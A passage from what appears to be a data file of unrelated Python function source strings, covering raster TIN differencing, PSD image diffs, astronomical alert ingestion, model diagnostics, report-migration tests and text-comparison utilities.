rasterio.open(jparams[\"input-file\"])\n out_profile = input_data.profile\n out_profile['dtype'] = 'float32'\n raw_data = input_data.read()\n PixelSizeX = input_data.transform[0]\n PixelSizeY = -input_data.transform[4]\n ###\n nodata_value = input_data.nodata\n ncols = input_data.width\n nrows = input_data.height\n shape = input_data.shape\n ###\n raster_pts = np.array(generate_raster_points(nrows, ncols, raw_data, nodata_value, PixelSizeX, PixelSizeY,0))\n ### generate the simplified TIN\n dt_2d = scipy.spatial.Delaunay([i[0:2] for i in pts_important])\n ###now let's compare them\n outlist = []\n linelist = []\n # print(ncols,nrows)\n # print(shape)\n # print(len(raster_pts))\n # print(len(raw_data[0][1]))\n col_counter = 0\n row_counter = 0\n for point in raster_pts:\n if point[2] == nodata_value:\n linelist.append(nodata_value)\n else:\n triangle_idx = dt_2d.find_simplex(point[0:2])\n if triangle_idx == -1:\n print(\"!!! 
WARNING: point outside convex hull of simplified dataset !!!\")\n linelist.append(nodata_value)\n else:\n interpolation = TIN_interpolator(pts_important, dt_2d, triangle_idx, point)\n linelist.append(point[2] - interpolation)\n #index counters\n col_counter +=1\n if col_counter == ncols:\n col_counter = 0\n outlist.append(linelist)\n linelist = []\n #print(diff_raster)\n #let's write the output file reusing the settings of the input file\n outputter = rasterio.open(jparams[\"output-file-differences\"], 'w', **out_profile)\n outputter.write(np.array([outlist]).astype(rasterio.float32))\n \n end = time.time()\n print(\"compute_differences takes \",end - start)", "def make_diff(file_before, file_after, file_output_name):\n if os.path.exists(file_output_name):\n shutil.rmtree(file_output_name)\n os.mkdir(file_output_name)\n psd_diff = diff(file_before, file_after)\n diff_content = {}\n for attr in [\"header\", \"layer\"]:\n diff_content[attr] = getattr(psd_diff, attr)\n with open(os.path.join(file_output_name, \"diff.json\"), \"w\") as diff_file:\n json.dump(diff_content, diff_file, indent=4)\n saved_files = []\n for layer_id in psd_diff.layer.keys():\n if len(psd_diff.layer_image[layer_id]) > 1:\n output_image = os.path.join(file_output_name, layer_id)\n psd_diff.layer_image[layer_id][\"before\"].save(output_image + \".before.png\")\n psd_diff.layer_image[layer_id][\"after\"].save(output_image + \".after.png\")\n diff_image_before = Image.new(\"RGBA\", psd_diff.layer_image[layer_id][\"before\"].size)\n diff_image_before_data = diff_image_before.load()\n diff_image_after = Image.new(\"RGBA\", psd_diff.layer_image[layer_id][\"after\"].size)\n diff_image_after_data = diff_image_after.load()\n width, height = diff_image_before.size\n pixel_index = 1\n for y in xrange(height):\n for x in xrange(width):\n if str(pixel_index) in diff_content[\"layer\"][layer_id][\"pixel\"]:\n diff_image_before_data[x, y] = tuple(diff_content[\"layer\"][layer_id][\"pixel\"][str(pixel_index)][\"before\"])\n diff_image_after_data[x, y] = tuple(diff_content[\"layer\"][layer_id][\"pixel\"][str(pixel_index)][\"after\"])\n else:\n diff_image_before_data[x, y] = (0, 0, 0, 0)\n diff_image_after_data[x, y] = (0, 0, 0, 0)\n pixel_index += 1\n diff_image_before.save(output_image + \".before.diff.png\", \"PNG\")\n diff_image_after.save(output_image + \".after.diff.png\", \"PNG\")\n saved_files.append(output_image + \".before.png\")\n saved_files.append(output_image + \".before.diff.png\")\n saved_files.append(output_image + \".after.diff.png\")\n saved_files.append(output_image + \".after.png\")\n saved_files.append(file_output_name + \"/diff.json\")\n return saved_files", "def update_22(db, filename_persist, snapshots_dir, snapshots_reference_dir):\n data = {\n # 'fail'\n 'test/test_pyglet_vb.py' : {\n 'st': 'fail', 'diag': 'incomplete grossini rendition at first frame'},\n\n # 'error'\n 'test/test_text_movement.py' : {\n 'st': 'error',\n 'diag': 'position should be set at the node level, not at the element level'},\n\n 'test/test_schedule_interval.py' : {\n 'st':'error', 'diag': 'bad timestamps, repeated snapshots'},\n\n 'test/test_transitions_with_pop_recipe.py' : {\n 'st':'error', 'diag': 'bad timestamps, repeated snapshots'},\n\n 'test/test_SequenceScene.py' : {\n 'st':'error', 'diag': 'bad timestamps, black frame'},\n\n 'test/test_camera_orbit.py' : {\n 'st':'error', 'diag': 'alternate snapshots are pure black'},\n\n 'test/test_jumptiles3d.py' : {\n 'st':'error', 'diag': \"snpshots don't folow changes in scene\"},\n\n 
'test/test_transition_zoom.py' : {\n 'st':'error', 'diag': 'bad timestamps, repeated snapshots'},\n }\n\n ren_key = {'st':'testrun_success', 'diag':'testrun_diagnostic'}\n testrun_props_by_candidate = {}\n for name in data:\n testrun_props_by_candidate[name] = dict([(ren_key[k], data[name][k]) for k in data[name]])\n \n hl.update_testrun__bad(db, filename_persist, testrun_props_by_candidate,\n snapshots_dir, snapshots_reference_dir)", "def update_alerts(self, source_path):\n\n read = 0\n added = 0\n errored = 0\n now = Time.now().iso\n\n alerts_insert = '''\n INSERT INTO alerts VALUES (\n :nightid,last_insert_rowid(),:jd,:fid,:pid,:diffmaglim,\n :pdiffimfilename,:programpi,:programid,:candid,\n :isdiffpos,:tblid,:nid,:rcid,:field,:xpos,:ypos,\n :ra,:dec,:magpsf,:sigmapsf,:chipsf,:magap,\n :sigmagap,:distnr,:magnr,:sigmagnr,:chinr,\n :sharpnr,:sky,:magdiff,:fwhm,:classtar,\n :mindtoedge,:magfromlim,:seeratio,:aimage,:bimage,\n :aimagerat,:bimagerat,:elong,:nneg,:nbad,:rb,\n :ssdistnr,:ssmagnr,:ssnamenr,:sumrat,:magapbig,\n :sigmagapbig,:ranr,:decnr,:sgmag1,:srmag1,:simag1,\n :szmag1,:sgscore1,:distpsnr1,:ndethist,:ncovhist,\n :jdstarthist,:jdendhist,:scorr,:tooflag,\n :objectidps1,:objectidps2,:sgmag2,:srmag2,:simag2,\n :szmag2,:sgscore2,:distpsnr2,:objectidps3,\n :sgmag3,:srmag3,:simag3,:szmag3,:sgscore3,\n :distpsnr3,:nmtchps,:rfid,:jdstartref,:jdendref,\n :nframesref,:exptime)\n '''\n\n tri = ProgressTriangle(1, self.logger, base=10)\n for path, dirs, files in os.walk(source_path):\n for f in files:\n if not f.endswith('avro'):\n continue\n\n read += 1\n tri.update()\n alert = util.avro2dict(os.path.join(path, f))\n try:\n candidate = alert['candidate']\n except TypeError:\n continue\n\n night = Time(candidate['jd'], format='jd').iso[:10]\n\n # exptime does not exist in older alerts\n jd0 = candidate['jd']\n jd1 = jd0 + candidate.get('exptime', 0)\n candidate['exptime'] = candidate.get('exptime')\n\n try:\n c = self.db.cursor()\n c.execute('''\n INSERT OR IGNORE INTO nights\n VALUES (NULL,:date,0,:now)\n ''', dict(date=night, now=now))\n\n candidate['nightid'] = c.execute('''\n SELECT nightid FROM nights\n WHERE date=:date\n ''', dict(date=night)).fetchone()[0]\n\n ra = np.radians(candidate['ra'])\n dec = np.radians(candidate['dec'])\n points = util.define_points(ra, dec, HALF_SIZE)\n rows = [[None, 'alerts', jd0, jd1, points]]\n self.db.add_observations(\n rows, other_cmd=alerts_insert,\n other_rows=[candidate])\n except sqlite3.IntegrityError:\n errored += 1\n continue\n\n c.execute('''\n UPDATE nights SET alerts=alerts+1 WHERE date=:date\n ''', dict(date=night))\n \n added += 1\n\n self.logger.info('{} files read, {} added to database.'\n .format(read, added))\n self.logger.warning('{} errored transactions.'.format(errored))", "def create_dicts_w_info(df,\n table_visit_diff_string,\n bad_records_string='num_bad_records'):\n\n hpos = df['src_hpo_id'].unique().tolist()\n\n site_dictionaries = {}\n\n for hpo in hpos:\n sample_df = df.loc[df['src_hpo_id'] == hpo]\n\n sample_df.loc[\"Total\"] = sample_df.sum(numeric_only=True)\n\n hpo_dict = sample_df.loc[\"Total\"].to_dict()\n\n site_dictionaries[hpo] = hpo_dict\n\n tot = 0\n\n num_bad_records = {}\n\n for hpo, info in site_dictionaries.items():\n num_bad_records[hpo] = info[bad_records_string]\n\n table_visit_diff_dict = {}\n tot_rec, tot_diff = 0, 0\n\n for hpo, info in site_dictionaries.items():\n bad_records = info[bad_records_string]\n difference = info[table_visit_diff_string]\n\n tot_rec += bad_records\n tot_diff += difference\n\n 
avg = round(difference / bad_records, 2)\n\n table_visit_diff_dict[hpo] = avg\n\n table_visit_diff_dict['Total'] = round(tot_diff / tot_rec, 2)\n\n return num_bad_records, table_visit_diff_dict", "def calculate_diagnostics(self):\n\n # create dictionary of lists of compartment values\n self.population_soln = {}\n for label in self.labels:\n if label in self.population_soln:\n continue\n self.population_soln[label] = self.get_compartment_soln(label)\n\n # used as flag to build var_array after self.calculate_vars\n # has been run\n self.var_labels = None\n\n n_time = len(self.times)\n for i in range(n_time):\n\n self.time = self.times[i]\n\n for label in self.labels:\n self.compartments[label] = self.population_soln[label][i]\n\n self.calculate_vars()\n self.calculate_flows()\n self.calculate_diagnostic_vars()\n\n # only set after self.calculate_diagnostic_vars has been run so that we have all var_labels,\n # including the ones in calculate_diagnostic_vars\n if self.var_labels is None:\n self.var_labels = list(self.vars.keys())\n self.var_array = numpy.zeros((n_time, len(self.var_labels)))\n self.flow_array = numpy.zeros((n_time, len(self.labels)))\n\n for i_label, label in enumerate(self.var_labels):\n self.var_array[i, i_label] = self.vars[label]\n for i_label, label in enumerate(self.labels):\n self.flow_array[i, i_label] = self.flows[label]\n\n # calculate compartment sizes as fractions of population\n self.fraction_soln = {}\n for label in self.labels:\n self.fraction_soln[label] = [\n old_div(v,\n t) for v,\n t in zip(\n self.population_soln[label],\n self.get_var_soln('population'))\n ]", "def test_migrate_interpretation_request_rd(self):\n old_instance = GenericFactoryAvro.get_factory_avro(\n self.old_model.InterpretationRequestRD, VERSION_300, fill_nullables=False\n ).create() # reports_3_0_0.InterpretationRequestRD\n self._validate(old_instance)\n migrated_instance = MigrateReports3To4().migrate_interpretation_request_rd(old_instance=old_instance)\n self._validate(migrated_instance)\n\n old_big_wigs = old_instance.bigWigs\n new_big_wigs = migrated_instance.bigWigs\n\n if old_big_wigs is not None:\n for old_big_wig, new_big_wig in zip(old_big_wigs, new_big_wigs):\n self.assertIsInstance(new_big_wig, self.new_model.File)\n self.assertEqual(new_big_wig.sampleId, old_big_wig.SampleId)\n self.assertEqual(new_big_wig.uriFile, old_big_wig.URIFile)\n self.assertEqual(new_big_wig.fileType, old_big_wig.fileType)\n self.assertEqual(new_big_wig.md5Sum, None)\n\n old_instance = GenericFactoryAvro.get_factory_avro(\n self.old_model.InterpretationRequestRD, VERSION_300, fill_nullables=True\n ).create() # reports_3_0_0.InterpretationRequestRD\n self._validate(old_instance)\n migrated_instance = MigrateReports3To4().migrate_interpretation_request_rd(old_instance=old_instance)\n\n for old_variant, new_variant in zip(old_instance.TieredVariants, migrated_instance.tieredVariants):\n for old_re, new_re in zip(old_variant.reportEvents, new_variant.reportEvents):\n self.assertEqual(old_re.genomicFeature.HGNC, new_re.genomicFeature.hgnc)\n\n self._validate(migrated_instance)", "def calc_orig(self):\n measure = self.measure\n # Calculate work for all possible matching pairs from sim and obs\n aw = np.full(shape=(len(self.q_obs), len(self.q_sim)), fill_value=np.nan)\n # iterate through all flow observations\n for i_o in range(len(self.q_obs)):\n # Check only simulations within the allowed window\n for i_s in range(max(0, i_o - self.max_lead),\n min(len(self.q_sim), i_o + self.max_lag + 1)):\n if measure in 
('nse', 'square'):\n aw[i_s, i_o] = (self.q_sim[i_s] - self.q_obs[i_o]) ** 2 + self.b ** 2 * (i_s - i_o) ** 2\n elif measure in ('mae', 'abs'):\n aw[i_s, i_o] = np.abs(self.q_sim[i_s] - self.q_obs[i_o]) + self.b * np.abs(i_s - i_o)\n\n # Calculate cumulative work along possible paths\n cw = np.ones(shape=aw.shape + (2,)) * np.nan\n # Populate first column\n cw[:, 0, 0] = aw[:, 0]\n\n if self.keep_internals:\n self.aw = aw\n self.cw = cw\n\n # Populate other columns\n # Filter out warning to suppress warnings from numpy when np.nanmin\n # encounters all NaN slices\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n for i_o in range(1, aw.shape[1]):\n for i_s in range(max(0, i_o - self.max_lead),\n min(aw.shape[1], i_o + self.max_lag + 1)):\n # e = aw[i_s, i_o]\n if measure in ('nse', 'square'):\n e = (self.q_sim[i_s] - self.q_obs[i_o]) ** 2 + self.b ** 2 * (i_s - i_o) ** 2\n elif measure in ('mae', 'abs'):\n e = np.abs(self.q_sim[i_s] - self.q_obs[i_o]) + self.b * np.abs(i_s - i_o)\n\n # Repeat the same simulation point\n cw[i_s, i_o, 1] = e + cw[i_s, i_o - 1, 0]\n\n if i_s > 0:\n m1 = np.nanmin(cw[i_s - 1, i_o - 1, :])\n if i_s > 1:\n # Skip a sim point\n m2 = np.nanmin(cw[i_s - 2, i_o - 1, :])\n else:\n m2 = np.inf\n m = min(m1, m2)\n cw[i_s, i_o, 0] = e + m\n self.opt_score = np.nanmin(cw[:, -1, :])\n self.of = 1 - self.opt_score / self.fbench\n\n if self.calc_rays:\n # self._do_calc_rays(cw[:, :, 0], cw[:, :, 1])\n s, e = 0, None\n for i_o in range(len(self.q_obs))[::-1]:\n # print('')\n # print(i_o, s, e)\n # print(cw[s:e, i_o, 0])\n m = np.nanargmin(cw[s:e, i_o, 0]) + s\n try:\n m_rep = np.nanargmin(cw[s:e, i_o, 1]) + s\n except ValueError:\n pass\n else:\n if cw[m_rep, i_o, 1] <= cw[m, i_o, 0]:\n m = m_rep\n self.tau[i_o] = i_o - m\n self.res[i_o] = self.q_obs[i_o] - self.q_sim[m]\n self.rays[i_o] = [(i_o, self.q_obs[i_o]), (m, self.q_sim[m])]\n # print(i_o, s, e, m)\n s, e = max(0, m - 2), m + 1\n\n return self.of", "def interpolate_loss_calculation(self, interpolates):\n _, fake_scores = self.D(interpolates)\n return fake_scores", "def calculate_flowamount_diff_between_dfs(dfa_load, dfb_load):\n\n # subset the dataframes, only keeping data for easy\n # comparison of flowamounts\n drop_cols = ['Year', 'MeasureofSpread', 'Spread', 'DistributionType',\n 'Min', 'Max', 'DataReliability', 'DataCollection']\n # drop cols and rename, ignore error if a df does not\n # contain a column to drop\n dfa = dfa_load.drop(drop_cols, axis=1, errors='ignore'\n ).rename(columns={'FlowAmount': 'FlowAmount_Original'})\n dfb = dfb_load.drop(drop_cols, axis=1, errors='ignore'\n ).rename(columns={'FlowAmount': 'FlowAmount_Modified'})\n # create df dict for modified dfs created in for loop\n df_list = []\n for d in ['a', 'b']:\n df_name = f'df{d}'\n # assign new column of geoscale by which to aggregate\n vars()[df_name+'2'] = vars()[df_name].assign(\n geoscale=np.where(vars()[df_name]['Location'].\n apply(lambda x: x.endswith('000')),\n 'state', 'county'))\n vars()[df_name+'2'] = vars()[df_name+'2'].assign(\n geoscale=np.where(vars()[df_name+'2']['Location'] == '00000',\n 'national', vars()[df_name+'2']['geoscale']))\n # ensure all nan/nones filled/match\n vars()[df_name + '2'] = \\\n replace_strings_with_NoneType(vars()[df_name+'2'])\n df_list.append(vars()[df_name+'2'])\n # merge the two dataframes\n for df in df_list:\n replace_NoneType_with_empty_cells(df)\n df = df_list[0].merge(df_list[1], how='outer')\n\n # determine if any new data is negative\n dfn = df[df['FlowAmount_Modified'] < 
0].reset_index(drop=True)\n if len(dfn) > 0:\n vLog.info('There are negative FlowAmounts in new dataframe, '\n 'see Validation Log')\n vLogDetailed.info('Negative FlowAmounts in new dataframe: '\n '\\n {}'.format(dfn.to_string()))\n\n # Because code will sometimes change terminology, aggregate\n # data by context and flowable to compare df differences\n # subset df\n dfs = df[['Flowable', 'Context', 'ActivityProducedBy',\n 'ActivityConsumedBy', 'FlowAmount_Original',\n 'FlowAmount_Modified', 'Unit', 'geoscale']]\n agg_cols = ['Flowable', 'Context', 'ActivityProducedBy',\n 'ActivityConsumedBy', 'Unit', 'geoscale']\n dfagg = dfs.groupby(\n agg_cols, dropna=False, as_index=False).agg(\n {'FlowAmount_Original': sum, 'FlowAmount_Modified': sum})\n # column calculating difference\n dfagg['FlowAmount_Difference'] = \\\n dfagg['FlowAmount_Modified'] - dfagg['FlowAmount_Original']\n dfagg['Percent_Difference'] = (dfagg['FlowAmount_Difference'] /\n dfagg['FlowAmount_Original']) * 100\n # drop rows where difference = 0\n dfagg2 = dfagg[dfagg['FlowAmount_Difference'] != 0].reset_index(drop=True)\n if len(dfagg2) == 0:\n vLogDetailed.info('No FlowAmount differences')\n else:\n # subset df and aggregate, also print out the total\n # aggregate diff at the geoscale\n dfagg3 = replace_strings_with_NoneType(dfagg).drop(\n columns=['ActivityProducedBy', 'ActivityConsumedBy',\n 'FlowAmount_Difference', 'Percent_Difference'])\n dfagg4 = dfagg3.groupby(\n ['Flowable', 'Context', 'Unit', 'geoscale'],\n dropna=False, as_index=False).agg(\n {'FlowAmount_Original': sum, 'FlowAmount_Modified': sum})\n # column calculating difference\n dfagg4['FlowAmount_Difference'] = \\\n dfagg4['FlowAmount_Modified'] - dfagg4['FlowAmount_Original']\n dfagg4['Percent_Difference'] = (dfagg4['FlowAmount_Difference'] /\n dfagg4['FlowAmount_Original']) * 100\n # drop rows where difference = 0\n dfagg5 = dfagg4[\n dfagg4['FlowAmount_Difference'] != 0].reset_index(drop=True)\n vLogDetailed.info('Total FlowAmount differences between dataframes: '\n '\\n {}'.format(dfagg5.to_string(), index=False))\n\n # save detail output in log file\n vLogDetailed.info('Total FlowAmount differences by Activity Columns: '\n '\\n {}'.format(dfagg2.to_string(), index=False))", "def test_review_status_update_from_source_trim(self):\n test_project_path = os.path.join(self.test_workspace,\n 'review_status_files')\n test_project_name = 'review_status_update_proj'\n\n plist_file = os.path.join(test_project_path, 'divide_zero.plist')\n source_file = os.path.join(test_project_path, 'divide_zero.cpp')\n plist_test.prefix_file_path(plist_file, test_project_path)\n\n codechecker_cfg = env.import_codechecker_cfg(self.test_workspace)\n codechecker_cfg['reportdir'] = test_project_path\n\n codechecker.store(codechecker_cfg, test_project_name)\n\n codechecker_cfg['trim_path_prefix'] = test_project_path\n\n # Run data for the run created by this test case.\n run_filter = RunFilter(names=[test_project_name], exactMatch=True)\n\n runs = self._cc_client.getRunData(run_filter, None, 0, None)\n run = runs[0]\n runid = run.runId\n logging.debug('Get all run results from the db for runid: ' +\n str(runid))\n\n reports = get_all_run_results(self._cc_client, runid)\n self.assertIsNotNone(reports)\n self.assertNotEqual(len(reports), 0)\n self.assertEqual(len(reports), 2)\n\n for report in reports:\n print(report)\n self.assertEqual(report.reviewData.status,\n ReviewStatus.INTENTIONAL)\n\n # Modify review comments from intentional to confirmed for the\n # second store.\n with 
open(source_file, 'r+', encoding='utf-8', errors='ignore') as sf:\n content = sf.read()\n new_content = content.replace(\"codechecker_intentional\",\n \"codechecker_confirmed\")\n sf.truncate(0)\n sf.write(new_content)\n\n # modify review comments and store the reports again\n with open(source_file, encoding='utf-8', errors='ignore') as sf:\n content = sf.read()\n\n # Update the plist file modification date to be newer than\n # the source file so it can be stored, because there was no\n # actual analysis.\n date = datetime.datetime.now() + datetime.timedelta(minutes=5)\n mod_time = time.mktime(date.timetuple())\n os.utime(plist_file, (mod_time, mod_time))\n\n codechecker.store(codechecker_cfg, test_project_name)\n\n # Check if all the review statuses were updated to the new at the\n # server.\n reports = get_all_run_results(self._cc_client, runid)\n self.assertIsNotNone(reports)\n self.assertNotEqual(len(reports), 0)\n self.assertEqual(len(reports), 2)\n for report in reports:\n self.assertEqual(report.reviewData.status, ReviewStatus.CONFIRMED)", "def calculate_loss(estimated_separation, true_separation, mask, true_latents, estimated_mix, true_mix, args):\n stats = torch.zeros(7)\n sdr = sdr_objective(estimated_separation, true_separation, mask)\n stats[:4] = sdr\n total_loss = -sdr.sum()\n reconstruction_sdr = sdr_objective(estimated_mix, true_mix).mean() if args.reconstruction_loss_weight > 0 else 0.0\n stats[4] = reconstruction_sdr\n total_loss += -args.reconstruction_loss_weight * reconstruction_sdr\n if args.similarity_loss_weight > 0.0 or args.dissimilarity_loss_weight > 0.0:\n mask = mask.squeeze(-1)\n true_latents = true_latents * mask.unsqueeze(-1).unsqueeze(-1)\n true_latents = true_latents.transpose(0, 1)\n dissimilarity = dissimilarity_loss(true_latents, mask) if args.dissimilarity_loss_weight > 0.0 else 0.0\n stats[5] = dissimilarity\n total_loss += args.dissimilarity_loss_weight * dissimilarity\n similarity = similarity_loss(true_latents, mask) if args.similarity_loss_weight > 0.0 else 0.0\n stats[6] = similarity\n total_loss += -args.similarity_loss_weight * similarity\n return total_loss, stats", "def _collect_lines( self, diffs ):\n\n\t\tfromlist, tolist, flaglist = [], [], []\n\t\t# pull from/to data and flags from mdiff style iterator\n\t\tfor fromdata, todata, flag in diffs:\n\t\t\ttry:\n\t\t\t\t# store HTML markup of the lines into the lists\n\t\t\t\tfromlist.append( self._format_line( 0, flag, *fromdata ) )\n\t\t\t\ttolist.append( self._format_line( 1, flag, *todata ) )\n\t\t\texcept TypeError:\n\t\t\t\t# exceptions occur for lines where context separators go\n\t\t\t\tfromlist.append( None )\n\t\t\t\ttolist.append( None )\n\t\t\tflaglist.append( flag )\n\t\treturn fromlist, tolist, flaglist", "def check_paths(self):\r\n\t\tself.check_line_edits_and_refresh_filestate()\r\n\t\t# paths\r\n\t\tsource_img_filename = self.source_img_entry.text().replace(\"\\\\\", \"/\")\r\n\t\tsink_dir_name = self.sink_dir_entry.text().replace(\"\\\\\", \"/\")\r\n\t\tsink_db_name_entry_text = self.sink_db_name_entry.text()\r\n\t\tdb_ext = \".db\" if not sink_db_name_entry_text.lower().endswith(\".db\") else \"\"\r\n\t\tsink_db_filename = os.path.join(sink_dir_name, sink_db_name_entry_text + db_ext).replace(\"\\\\\", \"/\")\r\n\t\tsource_db_filename = \"\"\r\n\r\n\t\t# check validity\r\n\t\tsource_img_filename_valid = self.filestate.is_valid(source_img_filename, SOURCE_IMG)\r\n\t\tsink_dir_name_valid = self.filestate.is_valid(sink_dir_name, SINK_DIR)\r\n\t\tsink_db_filename_valid = 
self.filestate.is_valid(sink_db_filename, SINK_DB)\r\n\t\tsource_db_filename_valid = True\r\n\r\n\t\tall_paths_valid = source_img_filename_valid and sink_dir_name_valid and sink_db_filename_valid\r\n\r\n\t\tif self.existing_case:\r\n\t\t\tsource_db_filename = self.source_db_entry.text()\r\n\t\t\tsource_db_filename_valid = self.filestate.is_valid(source_db_filename, SOURCE_DB)\r\n\t\t\tall_paths_valid = all_paths_valid and source_db_filename_valid\r\n\r\n\t\tif all_paths_valid:\r\n\t\t\tself.filestate.set_source_img_filename(source_img_filename)\r\n\t\t\tself.filestate.set_sink_dir_name(sink_dir_name)\r\n\t\t\tself.filestate.set_sink_db_filename(sink_db_filename)\r\n\t\t\tif self.existing_case:\r\n\t\t\t\tself.filestate.set_source_db_filename(source_db_filename)\r\n\t\t\tself.refresh_UI()\r\n\t\t\treturn True\r\n\r\n\t\t# in the case of invalidity\r\n\t\tif not source_img_filename_valid:\r\n\t\t\tif not self.filestate.source_img_file_exists:\r\n\t\t\t\tdisplay_warning_message(self, \"Provided source image file at does not exist.\")\r\n\t\t\telif not self.filestate.source_img_file_format_valid:\r\n\t\t\t\tdisplay_warning_message(self, \"Provided source image file type is invalid (must be .npy).\")\r\n\t\t\tself.filestate.set_source_img_filename(\"\")\r\n\t\tif not source_db_filename_valid: # only if existing case\r\n\t\t\tif not self.source_db_file_exists:\r\n\t\t\t\tdisplay_warning_message(self, \"Provided source database file does not exist.\")\r\n\t\t\telif not self.filestate.source_db_file_format_valid:\r\n\t\t\t\tdisplay_warning_message(self, \"Provided source database file type is invalid (must be .db)\")\r\n\t\t\tself.filestate.set_source_db_filename(\"\")\r\n\t\tif not sink_dir_name_valid:\r\n\t\t\tif not self.filestate.sink_dir_exists:\r\n\t\t\t\tdisplay_warning_message(self, \"Provided sink directory does not exist.\")\r\n\t\t\telif not self.sink_dir_format_valid:\r\n\t\t\t\tdisplay_warning_message(self, \"Provided sink directory format is invalid.\")\r\n\t\t\tself.filestate.set_sink_dir_name(\"\")\r\n\t\tif not sink_db_filename_valid:\r\n\t\t\tif sink_dir_name_valid and not self.filestate.sink_db_file_preexists and \\\r\n\t\t\t\t\tself.filestate.sink_db_file_format_valid and \\\r\n\t\t\t\t\tdisplay_yes_no_message(self, \"Create file at \" + sink_db_filename + \"?\"):\r\n\t\t\t\t# create file with read write permissions\r\n\t\t\t\t###########################################\r\n\t\t\t\ttry:\r\n\t\t\t\t\tsink_db_file = open(sink_db_filename, \"w+\")\r\n\t\t\t\t\tsink_db_file.close()\r\n\t\t\t\texcept IOError as error:\r\n\t\t\t\t\tdisplay_warning_message(self, \"Failed to create provided sink database file: \" + error)\r\n\t\t\t\t###########################################\r\n\t\t\t\t# set sink db filename\r\n\t\t\t\telse:\r\n\t\t\t\t\tself.filestate.set_sink_db_filename(sink_db_filename)\r\n\t\t\t\t\tself.refresh_UI()\r\n\t\t\t\t\treturn True\r\n\t\t\telif not self.filestate.sink_db_file_format_valid:\r\n\t\t\t\tdisplay_warning_message(self, \"Be sure to specify a name for the sink database.\")\r\n\t\t\tself.filestate.set_sink_db_filename(\"\")\r\n\r\n\t\t# print(\"paths invalid\")\r\n\t\tself.refresh_UI()\r\n\t\treturn False", "def _abort_on_conflicting_untracked_paths(self) -> None:\n repo = get_git_repo()\n\n if not repo or self._base_commit is None:\n return\n\n changed_paths = set(\n self._status.added\n + self._status.modified\n + self._status.removed\n + self._status.unmerged\n )\n untracked_paths = {\n self._fname_to_path(repo, str(path))\n for path in 
(self._dirty_paths_by_status.get(StatusCode.Untracked, []))\n }\n overlapping_paths = untracked_paths & changed_paths\n\n if overlapping_paths:\n raise ActionFailure(\n \"Some paths that changed since the baseline commit now show up as untracked files. \"\n f\"Please commit or stash your untracked changes in these paths: {overlapping_paths}.\"\n )", "def __CompareText1(self, s1, s2,result):\n # lines with tag that are excluded by hand (by the user) \n s0_excluded=list()\n for l0 in self.excluded_lines.splitlines():\n s0_excluded.append(l0.strip()) \n\n s1_filtered=list()\n s2_filtered=list() \n for l1 in s1.splitlines(): \n if l1.__contains__(self.stdout_tag): \n check=0\n for k in s0_excluded: \n if l1.__contains__(k): check=check+1 \n if check==0: s1_filtered.append(l1.strip())\n for l2 in s2.splitlines(): \n if l2.__contains__(self.stdout_tag): \n check=0\n for k in s0_excluded: \n if l2.__contains__(k): check=check+1 \n if check==0: s2_filtered.append(l2.strip())\n # some debug: shows the lines which will be compared \n mm=''\n nTot=0\n nDif=0\n nMis=0\n for l in range(max(len(s1_filtered),len(s2_filtered))): \n nTot=nTot+1\n if ( l>len(s1_filtered)-1 ): # ref[l] exists but log[l] does not\n nMis=nMis+1\n if ( nMis<=5 ) : # print only the first 5 missing lines\n mm=mm+'\\n%5i'%l\n if ( nMis<5 ) :\n mm=mm+'-> log: ...MISSING('+repr(nMis)+')...'+'\\n' \n else:\n mm=mm+'-> log: ...MISSING(5)... SKIP THE REST'+'\\n' \n if(l<=len(s2_filtered)-1):\n mm=mm+' ref: '+s2_filtered[l]+'\\n'\n else:\n mm=mm+' ref: '+'\\n'\n elif( l>len(s2_filtered)-1 or # log[l] exists but ref[l] does not\n s1_filtered[l] != s2_filtered[l] ): # log[l] != ref[l]\n nDif=nDif+1\n mm=mm+'\\n%5i'%l\n mm=mm+'-> log: '+s1_filtered[l]+'\\n'\n if(l<=len(s2_filtered)-1):\n mm=mm+' ref: '+s2_filtered[l]+'\\n' \n else:\n mm=mm+' ref: '+'\\n' \n if(nDif>0 or nMis>0): mm=mm+'\\nSummary: '+repr(nDif)+' lines differ and '+repr(nMis)+' are missing out of '+repr(nTot)+' lines\\n'\n result[\"ExecTest.stdout_VS_expected_stdout\"] = result.Quote(mm)\n logger.debug('ExecTestBase2:__CompareTest1: '+mm) \n # Comparision of filtered sets \n # - filtered sets should have the same length: if this is not the \n # case the test will stop here \n if not(len(s1_filtered)==len(s2_filtered)): \n self.causes.append(' Different number of tagged lines to compare \\n'+\\\n 'in the stdout and ref_stdout')\n return False \n # Scan of the s1 and ref_s1=s2 looking for the '=' \n s1_filtered_equals=list()\n s2_filtered_equals=list() \n for i in range(len(s1_filtered)):\n if s1_filtered[i].__contains__('='):\n s1_filtered_equals.append(s1_filtered[i].replace(\\\n self.stdout_tag,'').strip())\n if s2_filtered[i].__contains__('='):\n s2_filtered_equals.append(s2_filtered[i].replace(\\\n self.stdout_tag,'').strip()) \n # - in case there is not '=' the strings have to be the same \n if(not(s1_filtered[i].__contains__('=')) and \n s2_filtered[i].__contains__('=')): return False \n if(not(s1_filtered[i].__contains__('=')) and \n not(s2_filtered[i].__contains__('=')) and \n not(s1_filtered[i]==s2_filtered[i])): return False \n\n # Analysis of lines with '='\n fail_cond=True \n logger.debug('ExecTestBase2:__CompareTest1: # lines with = is '+\\\n repr(len(s1_filtered_equals))) \n for i in range(len(s1_filtered_equals)):\n s1_split_list=s1_filtered_equals[i].split('=')\n s2_split_list=s2_filtered_equals[i].split('=')\n logger.debug('ExecTestBase2:__CompareTest1: right side of = for '+\\\n repr(i)+' are '+s1_split_list[1]+' '+s2_split_list[1])\n # - No local tolerance 
